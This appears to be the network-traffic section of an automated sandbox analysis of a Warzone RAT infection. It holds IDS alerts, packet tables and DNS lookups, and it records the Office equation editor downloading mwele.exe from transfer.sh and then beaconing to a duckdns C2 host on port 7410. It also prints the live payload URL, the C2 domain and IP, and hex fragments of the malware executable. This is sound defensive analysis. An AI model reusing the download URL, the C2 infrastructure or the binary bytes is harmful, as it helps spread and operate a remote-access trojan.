45.137.65.132192.168.2.227410491732852326 01/05/23-12:34:25.148472	TCP	2852326	ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket	7410	49173	45.137.65.132	192.168.2.22
45.137.65.132192.168.2.227410491732852329 01/05/23-12:34:45.165117	TCP	2852329	ETPRO TROJAN Ave Maria/Warzone RAT PingCommand	7410	49173	45.137.65.132	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2023 12:32:57.751518965 CET	49171	80	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:57.783488035 CET	80	49171	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:57.783643961 CET	49171	80	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:57.785351038 CET	49171	80	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:57.814466000 CET	80	49171	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:57.814528942 CET	80	49171	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:57.814733028 CET	49171	80	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:57.913268089 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:57.913348913 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:57.913652897 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:57.992783070 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:57.992832899 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.119158983 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.120332003 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.137932062 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.137984991 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.138488054 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.138575077 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.515569925 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.515605927 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.942538977 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.942626953 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.942739964 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.942914009 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.942939043 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.944722891 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.950773954 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.955296993 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.955374002 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.955481052 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.955509901 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.955554008 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.955576897 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.960861921 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.972999096 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.973104954 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.973223925 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.973253965 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.973279953 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.973318100 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.981791973 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.981888056 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.981985092 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.982023001 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.982040882 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.982079029 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.982112885 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.987948895 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.988102913 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.988234997 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.988332987 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.988444090 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.993794918 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.994004011 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.994015932 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.994085073 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:58.994113922 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.994147062 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:58.995984077 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.000077963 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.000216961 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.000328064 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.000328064 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.000365019 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.000443935 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.000494003 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.003998995 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.004105091 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.004131079 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.004210949 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.006623030 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.006791115 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.006839037 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.006863117 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.006896973 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.006896973 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.006938934 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.009509087 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.009653091 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.009665012 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.009691000 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.009742975 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.017360926 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.017488003 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.017498016 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.017523050 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.017550945 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.017577887 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.019984007 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.021442890 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.021522999 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.021555901 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.021579027 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.021595001 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.021617889 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.021755934 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.025141954 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.025219917 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.025239944 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.025317907 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.025480986 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.027856112 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.027944088 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.027971029 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.028043032 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.028057098 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.028103113 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.028148890 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:32:59.028198957 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.028306961 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.029625893 CET	49172	443	192.168.2.22	144.76.136.153
Jan 5, 2023 12:32:59.029656887 CET	443	49172	144.76.136.153	192.168.2.22
Jan 5, 2023 12:33:01.133116961 CET	49171	80	192.168.2.22	144.76.136.153
Jan 5, 2023 12:33:05.016722918 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:33:05.045929909 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:33:05.046041012 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:33:05.086076021 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:33:05.104273081 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:33:05.194794893 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:33:05.194941044 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:33:05.273176908 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:33:25.103110075 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:33:25.107644081 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:33:25.194210052 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:33:45.116894960 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:33:45.133347034 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:33:45.225579977 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:34:05.134675980 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:34:05.140736103 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:34:05.225655079 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:34:25.148472071 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:34:25.161474943 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:34:25.241221905 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:34:45.165117025 CET	7410	49173	45.137.65.132	192.168.2.22
Jan 5, 2023 12:34:45.168154001 CET	49173	7410	192.168.2.22	45.137.65.132
Jan 5, 2023 12:34:45.242120028 CET	7410	49173	45.137.65.132	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2023 12:32:57.701093912 CET	55868	53	192.168.2.22	8.8.8.8
Jan 5, 2023 12:32:57.720464945 CET	53	55868	8.8.8.8	192.168.2.22
Jan 5, 2023 12:33:04.900712967 CET	49688	53	192.168.2.22	8.8.8.8
Jan 5, 2023 12:33:05.009839058 CET	53	49688	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2023 12:32:57.701093912 CET	192.168.2.22	8.8.8.8	0x6887	Standard query (0)	transfer.sh	A (IP address)	IN (0x0001)	false
Jan 5, 2023 12:33:04.900712967 CET	192.168.2.22	8.8.8.8	0x9d87	Standard query (0)	mcmac.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2023 12:32:57.720464945 CET	8.8.8.8	192.168.2.22	0x6887	No error (0)	transfer.sh		144.76.136.153	A (IP address)	IN (0x0001)	false
Jan 5, 2023 12:33:05.009839058 CET	8.8.8.8	192.168.2.22	0x9d87	No error (0)	mcmac.duckdns.org		45.137.65.132	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.sh

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49172	144.76.136.153	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49171	144.76.136.153	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2023 12:32:57.785351038 CET	0	OUT	GET /get/8LtEmv/mwele.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: transfer.sh Connection: Keep-Alive
Jan 5, 2023 12:32:57.814528942 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Thu, 05 Jan 2023 11:32:57 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://transfer.sh/get/8LtEmv/mwele.exe Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49172	144.76.136.153	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
2023-01-05 11:32:58 UTC	0	OUT	GET /get/8LtEmv/mwele.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: transfer.sh
2023-01-05 11:32:58 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 05 Jan 2023 11:32:58 GMT Content-Type: application/x-ms-dos-executable Content-Length: 226038 Connection: close Cache-Control: no-store Content-Disposition: attachment; filename="mwele.exe" Retry-After: Thu, 05 Jan 2023 12:33:00 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,84.17.52.8,84.17.52.8 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1672918380 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2023-01-05 11:32:58 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1f 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 2a 02 00 00 08 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf_9PfPgLPf_;PfsVPf.V`PfRichPfPELOah*
2023-01-05 11:32:58 UTC	16	IN	Data Raw: 00 68 00 7f 00 00 53 ff d7 50 ff 15 f0 81 40 00 8b 7d 14 81 7f 08 00 07 00 00 75 48 81 7f 0c 00 01 00 00 75 3f 83 7f 10 0d 75 10 53 6a 01 68 11 01 00 00 ff 35 68 a2 42 00 ff d6 83 7f 10 1b 75 0c 53 53 6a 10 ff 35 68 a2 42 00 ff d6 33 c0 40 eb 1e 81 7d 0c 0b 04 00 00 75 06 ff 05 14 17 42 00 8b 7d 14 57 ff 75 10 ff 75 0c e8 24 fc ff ff 5f 5e 5b c9 c2 10 00 83 3d ec a2 42 00 00 a1 10 17 42 00 75 05 a1 44 37 42 00 6a 01 6a 01 68 f4 00 00 00 50 ff 15 80 82 40 00 c3 55 8b ec 83 ec 3c 8b 45 08 83 65 d8 00 83 65 dc 00 89 45 cc 8b 45 0c c7 45 c8 00 05 00 00 89 45 d4 8d 45 c4 50 c7 45 e0 01 00 00 00 c7 45 d0 c8 a3 40 00 e8 24 12 00 00 c9 c2 0c 00 55 8b ec 81 7d 0c 10 01 00 00 56 8b 75 14 75 26 ff 76 30 6a 1d ff 75 08 e8 39 fb ff ff 8b 46 3c c1 e0 0b 05 00 b0 42 00 Data Ascii: hSP@}uHu?uSjh5hBuSSj5hB3@}uB}Wuu$_^[=BBuD7BjjhP@U<EeeEEEEEPEE@$U}Vuu&v0ju9F<B
2023-01-05 11:32:58 UTC	32	IN	Data Raw: 00 46 00 43 6f 70 79 46 69 6c 65 57 00 14 03 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 f4 01 47 65 74 57 69 6e 64 6f 77 73 44 69 72 65 63 74 6f 72 79 57 00 00 d6 01 47 65 74 54 65 6d 70 50 61 74 68 57 00 00 11 01 47 65 74 43 6f 6d 6d 61 6e 64 4c 69 6e 65 57 00 ea 01 47 65 74 56 65 72 73 69 6f 6e 45 78 57 00 15 03 53 65 74 45 72 72 6f 72 4d 6f 64 65 00 00 cd 03 6c 73 74 72 6c 65 6e 57 00 00 ca 03 6c 73 74 72 63 70 79 6e 57 00 94 03 57 69 64 65 43 68 61 72 54 6f 4d 75 6c 74 69 42 79 74 65 00 50 01 47 65 74 44 69 73 6b 46 72 65 65 53 70 61 63 65 57 00 0a 02 47 6c 6f 62 61 6c 55 6e 6c 6f 63 6b 00 00 03 02 47 6c 6f 62 61 6c 4c 6f 63 6b 00 00 6f 00 43 72 65 61 74 65 54 68 72 65 61 64 00 00 71 01 47 65 74 4c 61 73 74 45 72 72 6f 72 Data Ascii: FCopyFileWSetEnvironmentVariableWGetWindowsDirectoryWGetTempPathWGetCommandLineWGetVersionExWSetErrorModelstrlenWlstrcpynWWideCharToMultiBytePGetDiskFreeSpaceWGlobalUnlockGlobalLockoCreateThreadqGetLastError
2023-01-05 11:32:58 UTC	48	IN	Data Raw: a9 cb e9 43 32 97 40 12 28 81 6a 05 50 79 eb 5f 23 02 60 33 06 25 8e 1a 88 86 d3 67 b0 07 c3 1d 7f ae 5a de 0e cd 78 1e c7 5e 5d ec d6 fc ca 80 35 45 58 93 3b 17 e6 8a cd 5e b3 ca cc 2a 37 3b 73 b3 0a ce fa db a6 33 36 cc fd f3 7c aa dc be 31 98 c1 0b 51 a5 00 36 c4 53 0b c0 92 32 ad 08 80 c1 26 0c 69 b4 64 0e a2 ae ee e1 f0 33 d5 f3 c6 96 08 db d1 67 94 5b f3 6b 81 55 56 56 a1 d9 99 3b d7 b2 65 4d 71 76 c6 b6 56 6e f6 7e 81 25 b0 cf 17 50 e5 16 17 d3 bc 18 75 0a 20 21 8d 15 ae 20 f6 da 5a 19 d5 ba 36 a0 5c d8 ea bd 4d de 5b 4a 32 b0 bf 96 60 f5 bc 55 94 16 e3 8f d6 ed 50 76 3a cf 95 68 59 93 dc 5a a9 d9 96 f5 b7 ad 17 d3 ac 67 6f f6 19 36 ea a8 d0 12 8a a8 72 6b ff ea a3 8f a3 56 01 fc 46 9b 0e ec b5 96 5a 00 a6 b4 1b f4 a8 3b e9 3e a4 4e 98 64 f7 6a a6 Data Ascii: C2@(jPy_#`3%gZx^]5EX;^*7;s36\|1Q6S2&id3g[kUVV;eMqvVn~%Pu ! Z6\M[J2`UPv:hYZgo6rkVFZ;>Ndj
2023-01-05 11:32:58 UTC	64	IN	Data Raw: ee 1d 14 c3 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 12 70 3d 1a 12 70 f4 1a 12 70 ff 1a 12 70 ff 1c 13 99 ff 1e 15 c3 ff 1e 15 c3 ff 1e 15 c4 ff 1e 15 c4 ff 1e 15 c4 ff 1d 14 c3 ff 1d 14 c3 ff 1d 14 c3 ff 1d 14 c3 ff 1d 14 c3 ed 1d 14 c3 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 12 70 05 1a 12 70 96 1a 12 70 f3 1a 12 70 ff 1c 13 92 ff 1e 15 c0 ff 1e 15 c3 ff 1e 15 c4 ff 1e 15 c4 ff 1e 15 c4 ff 1d 14 c3 ff 1d 14 c3 ff 1d 14 c3 ff 1d 14 c3 ff 1d 14 c3 ec 1d 14 c3 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 12 70 26 1a 12 70 b5 1a 12 70 fe 1b 13 8c ff 1e 15 bc ff 1e 15 Data Ascii: ^p=ppp[ppppXp&pp
2023-01-05 11:32:58 UTC	80	IN	Data Raw: 66 30 aa e6 64 14 01 8e ca 9c 53 a5 f7 8e b6 5c e8 5d 32 c5 1d a0 0d 5a e3 4d 60 aa 93 b8 36 0e dc 26 34 ca cb 0a 3d 8d 6e c0 e2 79 47 ba ab e6 93 e0 13 1c 9c 5a 20 14 1c 97 93 28 a5 f7 ed 52 56 8f 02 c4 ce 4f cf d4 c6 3c bf 61 11 17 98 96 a6 fe d2 86 b9 07 77 a6 aa 21 0f 3f 3f f3 1b bb e1 40 a3 f3 48 92 7c 7a 8e 00 f3 15 8c 9f 7d 48 2e 2a 83 80 4c b6 e2 54 45 37 72 be cb 99 91 75 da 45 13 59 93 c2 09 04 37 b9 69 5b b5 05 1e a7 39 54 ea 1f 8d 4e 5b 61 17 6e 19 16 4a 9c 11 30 64 e4 3b f2 c2 d8 dd 7a 54 d3 7f f4 51 6c de 74 a6 e6 1d 9e 1f 8e 9f e7 ac a7 2b 65 44 f1 28 d9 80 b5 d9 61 60 93 b5 8a 7d 96 b2 aa 38 5f c0 30 84 e9 57 31 a5 a4 c8 ea c9 ec 3c 56 1b aa 11 ee 21 ed 85 23 ad dc b9 95 bd 1e d1 e2 ef 62 72 f0 cc 8d b4 27 25 9f 19 86 dc da 0c 67 93 d6 26 Data Ascii: f0dS\]2ZM`6&4=nyGZ (RVO<aw!??@H\|z}H.*LTE7ruEY7i[9TN[anJ0d;zTQlt+eD(a`}8_0W1<V!#br'%g&
2023-01-05 11:32:58 UTC	96	IN	Data Raw: 34 cb b5 39 d9 95 41 57 af d5 54 0e 3f b5 cc 71 a8 bc ea d2 6c 4d a2 1c ac cd e1 92 29 32 d8 cb dc ab da 9f 76 3d fe b6 58 62 0c de 68 30 e9 5f e9 e1 b7 70 d8 38 25 8f 77 8e 23 23 41 03 43 0f d9 de 77 47 81 8b 6b 87 5c 9c 14 e8 0b a9 25 0b 42 23 a4 9c 61 ce 43 45 8c d1 cf 66 c8 fe 2b 0b 53 e3 42 8a 8f aa e9 71 bc 09 78 c3 49 b8 d6 2c 30 f3 4f 8d e4 cd 37 6d f7 0c ff 6d 54 29 3d 9e 13 be 82 cb f6 05 46 6f fd 87 16 bb 07 d0 d3 f9 45 a2 36 57 40 1d ea 09 1a 2d 6c 2e f7 29 b7 45 42 2c e1 8f 45 75 b6 9f ec 28 2b 83 7b b5 5b d8 ec b5 a4 8e db 4f aa 82 47 80 a3 35 1e 08 08 62 01 bd 91 c3 ac d9 e3 86 5b 4e 07 13 ce fb 21 fb f6 af 96 61 0d cd 86 68 e3 0a df 33 ae 01 8f 36 ea ea 67 64 63 ad 30 9d 15 b5 7a e7 b7 63 44 9e 63 52 c6 7a dc 6d 2e 4f 22 cc c3 0b bd 75 18 Data Ascii: 49AWT?qlM)2v=Xbh0_p8%w##ACwGk\%B#aCEf+SBqxI,0O7mmT)=FoE6W@-l.)EB,Eu(+{[OG5b[N!ah36gdc0zcDcRzm.O"u
2023-01-05 11:32:58 UTC	112	IN	Data Raw: 83 59 5d d0 62 a2 82 5c c4 ae 0a f8 4b 6f 32 43 e9 ce 3b 09 9e 55 d4 eb 20 b0 86 12 e9 1d e4 d4 4d 4e c1 b2 e6 95 b9 6a 6d 13 3b bf 89 14 86 92 bf ea b7 08 8c a6 c5 51 2f ce a5 59 33 aa d2 5a 7a ae a6 af 9c 96 d9 b0 d7 11 e5 7a af 7f 46 1d a0 4f ac 5f 30 1b 2d bc 91 9a 31 71 23 3b ce 7c bd f0 ba a2 d3 56 08 f6 2f 2a 2a 64 c7 b4 d7 88 85 d0 93 54 83 50 62 26 16 d4 9d 15 d3 1d 29 67 53 05 ed e4 25 34 04 7e 3a fb fb 00 a4 1c e2 af e2 0b 71 8e 71 24 ca 5c 19 ec 2d b9 dc ab a3 5f 76 f5 26 6a 15 54 45 49 c7 9a e1 68 30 89 29 b9 96 bd 9a 42 a0 6a 74 4a 26 c1 b9 f6 b7 09 6c 46 da fb 22 ac 7e a6 2f 02 7d 48 16 cd 72 64 c3 c4 69 8e 25 5a 5a 78 48 a8 ca d6 73 03 87 74 67 5a 8f bb 72 ae b7 e9 5d 77 65 63 21 b6 a0 4a 3e 18 3f 02 95 e1 9e d8 3d 8c be 07 e5 f8 c9 d0 79 Data Ascii: Y]b\Ko2C;U MNjm;Q/Y3ZzzFO_0-1q#;\|V/**dTPb&)gS%4~:qq$\-_v&jTEIh0)BjtJ&lF"~/}Hrdi%ZZxHstgZr]wec!J>?=y
